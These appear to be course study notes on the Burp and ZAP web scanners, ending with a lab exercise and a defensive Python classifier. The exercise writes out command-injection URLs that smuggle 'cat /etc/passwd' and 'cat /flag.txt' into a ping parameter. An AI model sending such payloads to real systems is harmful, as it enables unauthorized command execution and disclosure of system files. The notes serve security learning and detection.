# Burp Scanner
- `Burp Scanner` is a powerful scanner for various types of web vulnerabilities, using a `Crawler` to build the website structure and a `Scanner` for passive and active scanning
- However, this is a paid-only tool (Burp Suite Professional)
- Options for starting a scan:
	- Start a scan on a specific request from `Proxy History`
	- Start a new scan on a set of one or more targets
	- Start a scan on items in scope
- Once the scope is set, we can go to `Dashboard` and click on `New Scan` to configure our scan
	- We are given two options: `Crawl & Audit` and `Crawl`
	- We can also set a crawl strategy
- For both options, the `Crawler` navigates the website by following any links found in its pages, submitting any forms, and examining the requests it makes to build a comprehensive map of the site. In the end, Burp Scanner presents us with a map of the target, showing all publicly accessible data in a single place
- Once the scans are complete, we can generate an HTML or XML report
# ZAP Scanner
- `ZAP Scanner` is capable of building site maps using `ZAP Spider` and performing both passive and active scans to look for various types of vulnerabilities ![[images/Pasted image 20251114181852.png]]
- `ZAP Spider`
	- Builds a site map ![[images/Pasted image 20251114182417.png]]
	- To start a Spider scan on any website, we can locate a request from our History tab and select (`Attack>Spider`) from the right-click menu
	- Another option is to use the HUD in the pre-configured browser ![[images/Pasted image 20251114182434.png]]
		- The left side shows page-specific info and the right side shows info for the overall site
- Passive Scanner
	- Automatically runs on each response while `ZAP Spider` runs
	- Identifies potential issues and vulns
- Active Scanner
	- Tries various attacks against all identified pages in the site map and their HTTP parameters to identify vulns
- Can generate an HTML, XML, or Markdown report ![[images/Pasted image 20251114183448.png]]
# Exercise
- Run a spider scan to build a site map
- Run an active scan
- Let this cook
- We get a high-risk alert for remote OS command injection ![[images/Pasted image 20251114182856.png]]
- The scan confirmed it with the request below, which injects the command `cat /etc/passwd` ![[images/Pasted image 20251114183204.png]]
```
http://94.237.58.116:33439/devtools/ping.php?ip=127.0.0.1%26cat+%2Fetc%2Fpasswd%26
```
- We will have to change this to `cat /flag.txt` with the proper URL encoding
```
http://94.237.58.116:33439/devtools/ping.php?ip=127.0.0.1%26cat+%2Fflag%2Etxt%26
# %26 = &   (separates the injected command from the ping target)
# +   = [space]
# %2F = /
# %2E = .
```
- After editing the request as above, we can replay it from the console and view the response ![[images/Pasted image 20251114183204.png]]
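- As an added defender-side example (not from these notes or from ZAP), the Python below decodes the `ip` query parameter the same way the server would see it, so a WAF rule or log review can tell an encoded injection like the one above from a normal ping; the host name and sample URLs are constructed

```python
from urllib.parse import urlsplit, parse_qs
import ipaddress
import re

# Shell metacharacters that a ping-style "ip" parameter should never contain.
SHELL_META = re.compile(r"[;&|`$<>\n\\(){}]")


def classify_ip_param(url: str) -> dict:
    """Decode the URL as the server would and check the 'ip' parameter.

    Returns a dict with the decoded value and a verdict: 'clean' when the value
    is a bare IPv4/IPv6 address, 'suspicious' otherwise (with any shell
    metacharacters found), 'missing' when the parameter is absent.
    """
    # parse_qs splits on the raw '&' first, so an encoded %26 stays inside
    # the value; it then percent-decodes and turns '+' into a space.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = params.get("ip", [])
    if not values:
        return {"ip": None, "verdict": "missing"}
    raw = values[0]
    try:
        ipaddress.ip_address(raw)
        return {"ip": raw, "verdict": "clean"}
    except ValueError:
        pass
    meta = sorted(set(SHELL_META.findall(raw)))
    return {"ip": raw, "verdict": "suspicious", "metachars": meta}


# Constructed sample requests: a normal ping and the scanner's injection pattern.
SAMPLE_REQUESTS = [
    "http://target.example/devtools/ping.php?ip=127.0.0.1",
    "http://target.example/devtools/ping.php?ip=127.0.0.1%26cat+%2Fetc%2Fpasswd%26",
    "http://target.example/devtools/ping.php?ip=",
]


def scan(urls):
    """Classify every URL in a list (e.g. lines pulled from an access log)."""
    return [classify_ip_param(u) for u in urls]


if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(result)
```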